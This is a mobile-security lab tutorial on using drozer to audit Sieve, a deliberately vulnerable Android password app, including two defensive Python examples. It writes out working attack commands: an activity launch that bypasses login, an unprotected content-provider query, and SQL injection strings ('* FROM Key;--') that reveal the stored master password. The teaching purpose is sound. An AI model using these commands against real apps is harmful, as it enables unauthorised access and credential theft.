Proj 10: Drozer (20 pts)

What You Need for This Project

Purpose

To practice using drozer, "a comprehensive security audit and attack framework for Android", according to its product page.

Drozer allows you to audit IPC endpoints.


Task 1: Installing Drozer

Installing Drozer on Kali

On Kali, in a Terminal, execute these commands:
wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl

pip install drozer-2.4.4-py2-none-any.whl
Drozer is "successfully installed", as shown below.

Downloading the Drozer Agent

The Drozer agent is an Android app that works with the drozer software on Kali to test app security.

On Kali, in a Terminal, execute these commands:

mkdir drozer
cd drozer
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
The file downloads, as shown below.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Installing the Agent on Android

On Kali, in a Terminal, execute this command:
adb install drozer-agent-2.3.4.apk
You see a "Success" message, as shown below.

Port Forwarding

Drozer needs to connect to port 31415 on the Android device, and the easiest way to do that is to forward the local port 31415 on Kali to the Android device with adb.

On Kali, in a Terminal, execute this command:

adb forward tcp:31415 tcp:31415
The command completes without errors, as shown below.

Launching the Agent

On your Android device, from the home screen, swipe up from the bottom center to see all apps.

Launch drozer, as shown below.

In the "drozer" screen, at the lower right, click OFF. Now the "Embedded Server" is "ON", as shown below.


Task 2: Exploring Drozer

Opening the drozer Console

On Kali, in a Terminal, execute these commands:
drozer console connect
help
Drozer starts, as shown below.

On Kali, at the dz> prompt, execute these commands:

help shell
! whoami
As you can see, Drozer allows you to run shell commands on your device, with the permissions of the Drozer agent, which is not root, but a numbered user account. On my device, the account was u0_s102, as shown below.

On Kali, at the dz> prompt, execute this command:

list
A long list of drozer modules appears, as shown below. Drozer is a huge pentesting framework, like Metasploit.

On Kali, at the dz> prompt, execute this command:

exit

Task 3: Installing Sieve

Installing Sieve

We'll use an intentionally vulnerable app to practice using drozer.

On Kali, in the Terminal, execute these commands.

wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk
adb install sieve.apk
If you are using Nox, the install succeeds, because Nox includes ARM translation libraries.

If you are using a Mac or Linux with Genymotion, the install fails, saying "NO_MATCHING_ABIS", as shown below.

The problem is that Sieve is an ARM app, but Genymotion is an x86 emulator.

Troubleshooting

If that download link fails, use this alternate command:
wget https://samsclass.info/128/proj/sieve.apk

Installing ARM Translation Libraries

If you are working on an off-campus network, such as a coffeehouse or "Danger Zone" in S214, on your host system, open a Web browser and go to

https://mega.nz/usg=ALkJrhgzajMZiTGuDUTxVBaGBlodOhsZbQ#F!JhcFwKpC!yfhfeUzvIZoSdBgfdZ9Ygg

Download ARM_Translation_Oreo.zip.

Troubleshooting

If that download link fails, use this alternate download link:

https://samsclass.info/128/proj/ARM_Translation_Oreo.zip

If you are using Genymotion on Mac or Linux, drag the ARM_Translation_Oreo.zip file onto your Android device and drop it there.

A warning message pops up, as shown below. Click OK.

A message says the file was flashed successfully, as shown below. Click OK.

Turn off your Android device and restart it.

Connecting to your Android Device with ADB

Adb lost its connection to the Genymotion device when it restarted, so you must connect it again.

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:

adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Installing Sieve Again

On Kali, in the Terminal, execute this command:
adb install sieve.apk
You see a "Success" message, as shown below.

Putting Passwords into Sieve

On your Android device, from the home screen, swipe up from the bottom center to see all apps.

Launch Sieve, as shown below.

A "Welcome!" screen appears, as shown below.

Enter a password of Password12345678 in both fields and click Submit.

On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit, as shown below.

On the next page, enter a password of Password12345678 and click "Sign in", as shown below.

In the "Your Passwords" page, at the top right, click the + icon.

Enter some test data, as shown below, and click Save.

Don't put any real passwords into this app, of course, because they will be revealed later in the project.


Task 4: Finding Sieve's Attack Surface with Drozer

Launching the Agent

On your Android device, from the home screen, swipe up from the bottom center to see all apps.

Launch drozer, as shown below.

The "Embedded Server" should be "ON", as shown below.

Retrieving Package Information

On Kali, in a Terminal, execute the first two commands below, then execute the third at the dz> prompt:
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -f sieve 
Drozer finds the package name of the Sieve app, which is

com.mwr.example.sieve

as shown below.

To see basic package information, on Kali, at the dz> prompt, execute this command:

run app.package.info -a com.mwr.example.sieve
This shows where the app stores data, what permissions it has, and more information, as shown below.

Identifying the Attack Surface

To see what vulnerabilities are exposed through Android’s built-in Inter-Process Communication (IPC) system, on Kali, at the dz> prompt, execute this command:
run app.package.attacksurface com.mwr.example.sieve 
Drozer finds several items "exported" as shown below. These items accept input from other apps, and are possible avenues of exploitation.
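
As an added illustration (not part of the original project and not drozer's own code), the Python sketch below makes the same kind of check from the defender's side: it reads a decoded AndroidManifest.xml and lists the components that are exported with no permission. The manifest, package name and component names are constructed for the example, and the default-export rule is simplified as noted in the comments.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest for illustration; this is not Sieve's real manifest.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.vault">
  <application>
    <activity android:name=".LoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
      </intent-filter>
    </activity>
    <activity android:name=".EntryList" android:exported="true"/>
    <activity android:name=".Settings" android:exported="false"/>
    <service android:name=".AuthService" android:exported="true"
             android:permission="com.example.vault.BIND"/>
    <provider android:name=".DBProvider" android:exported="true"
              android:authorities="com.example.vault.DBProvider"/>
  </application>
</manifest>"""

def exported_components(manifest_xml):
    """Return (kind, name, permission) for every component other apps can reach."""
    root = ET.fromstring(manifest_xml)
    found = []
    for kind in ("activity", "service", "receiver", "provider"):
        for comp in root.iter(kind):
            flag = comp.get(ANDROID + "exported")
            if flag is None:
                # Simplification: with no explicit flag, an intent-filter implies exported.
                exported = comp.find("intent-filter") is not None
            else:
                exported = flag == "true"
            if exported:
                # Simplification: provider readPermission/writePermission are not checked.
                perm = comp.get(ANDROID + "permission")
                found.append((kind, comp.get(ANDROID + "name"), perm))
    return found

def unprotected(manifest_xml):
    """Exported components with no permission, which drozer reports as 'Permission: null'."""
    return [(k, n) for k, n, p in exported_components(manifest_xml) if p is None]

if __name__ == "__main__":
    for kind, name in unprotected(SAMPLE_MANIFEST):
        print(f"{kind:9} {name}  exported, no permission required")
```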


Task 5: Auditing Sieve's Activities with Drozer

Launching Activities

To see which activities Sieve exports, on Kali, at the dz> prompt, execute this command:
run app.activity.info -a com.mwr.example.sieve 
Drozer finds several items "exported" as shown below. These items accept input from other apps, and are possible avenues of exploitation.

The "MainLoginActivity" makes sense--the app needs to take input from the keyboard for that.

But what are "FileSelectActivity" and "PWList"? They are both exported, and can be run without any permissions, as indicated by the "Permission: null" message.

Look at your Android Device

On your Android device, click the Home button to see the Home screen, as shown below.

Position the Android device so that it remains visible while you execute the Drozer command below.

Launching PWList

To run the "PWList" activity, on Kali, at the dz> prompt, execute this command:
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList 
The command runs without errors, as shown below.

On your Android device, the "Your Passwords" page opens, as shown below.

This is an authentication bypass exploit--the Drozer agent did not need your password or PIN to open this screen.

But at this point, we only see usernames, not passwords.


Task 6: Auditing Sieve's Content Providers with Drozer

Reading from Content Providers

The "Attack Surface" said Sieve used two content providers. To get more information about them, on Kali, at the dz> prompt, execute this command:
run app.provider.info -a com.mwr.example.sieve 
Drozer finds two exported content providers: DBContentProvider and FileBackupProvider, as shown below. They don't require any permissions to interact with them, except for the /Keys path in the DBContentProvider.

Finding URIs

Content provider URIs always begin with content:// but the rest is not obvious. Drozer can guess them, however.

On Kali, at the dz> prompt, execute this command:

run scanner.provider.finduris -a com.mwr.example.sieve 
Drozer tries several guesses, and finds three "Accessible content URIs", highlighted in the image below.

We know the /Keys provider requires permissions, but evidently not /Passwords. To run the /Passwords provider, on Kali, at the dz> prompt, execute this command:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ 
You see your username and encoded password, highlighted in the image below.

The password was unprintable binary data, so Drozer encoded it with Base64. We don't have the plaintext password yet.

Saving a Screen Image

Make sure you can see YOURNAME and the Base64-encoded password string, as shown above.

Save a full-desktop image. On a Mac, press Shift+Command+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 10", replacing "YOUR NAME" with your real name.


Task 7: Exploiting Database-Backed Content Providers with SQL Injection

Triggering a SQL Error

As usual, adding an apostrophe to a request triggers an error message. There are two fields we can inject into: projection and selection.

On Kali, at the dz> prompt, execute these commands:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
The reply shows "SQLITE_ERROR" messages, including the source code for the query, highlighted in the image below.

Enumerating Table Names

Execute this command to list the table names in the database:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
The reply reveals three table names, including Key, highlighted in the image below.

Finding Cleartext Passwords

SQL injection allows us to query the contents of the otherwise protected Key table.

Execute this command:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
The reply reveals your plaintext password, as shown below.
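
Why these projection strings work, shown as an added example that is not Sieve's source code: a query function that pastes the caller's projection and selection into the SQL text, next to a hardened version. It uses Python's sqlite3 as a stand-in for Android's SQLite; the table names follow the page, while the column names, sample rows and function names are assumptions.

```python
import sqlite3

ALLOWED_COLUMNS = {"service", "username", "password"}

def make_db():
    """Constructed stand-in database: table names from the page, columns assumed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords (service TEXT, username TEXT, password BLOB);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES ('mail', 'YOURNAME', x'0badc0de');
        INSERT INTO Key VALUES ('example-master-password', '0000');
    """)
    return db

def query_vulnerable(db, projection="*", selection=None):
    # Both caller-controlled strings are pasted straight into the SQL text.
    sql = "SELECT " + projection + " FROM Passwords"
    if selection:
        sql += " WHERE (" + selection + ")"
    return db.execute(sql).fetchall()

def query_hardened(db, columns=("service", "username"), username=None):
    # Projection: only known column names are accepted, never SQL fragments.
    rejected = [c for c in columns if c not in ALLOWED_COLUMNS]
    if rejected:
        raise ValueError(f"projection rejected: {rejected!r}")
    sql = "SELECT " + ", ".join(columns) + " FROM Passwords"
    args = ()
    if username is not None:
        # Selection: fixed SQL text, the value travels as a bound parameter.
        sql += " WHERE username = ?"
        args = (username,)
    return db.execute(sql, args).fetchall()

def projection_blocked(db, projection):
    """True when the hardened query refuses a projection string."""
    try:
        query_hardened(db, columns=(projection,))
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    payload = "* FROM Key;--"  # projection string used on the page
    print("vulnerable:", query_vulnerable(db, payload))
    print("hardened blocks it:", projection_blocked(db, payload))
    print("bound selection:", query_hardened(db, username="' OR 1=1--"))
```

In the vulnerable function the trailing `--` comments out the intended `FROM Passwords`, so the statement that actually runs reads from the Key table instead.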

Turning in your Project

Email the image to cnit.128sam@gmail.com with the subject line: Proj 10 from YOUR NAME

Sources

Drozer
drozer user guide

Posted 1-17-19 by Sam Bowne
Extra image removed 2-20-19
Nox instructions added 3-12-19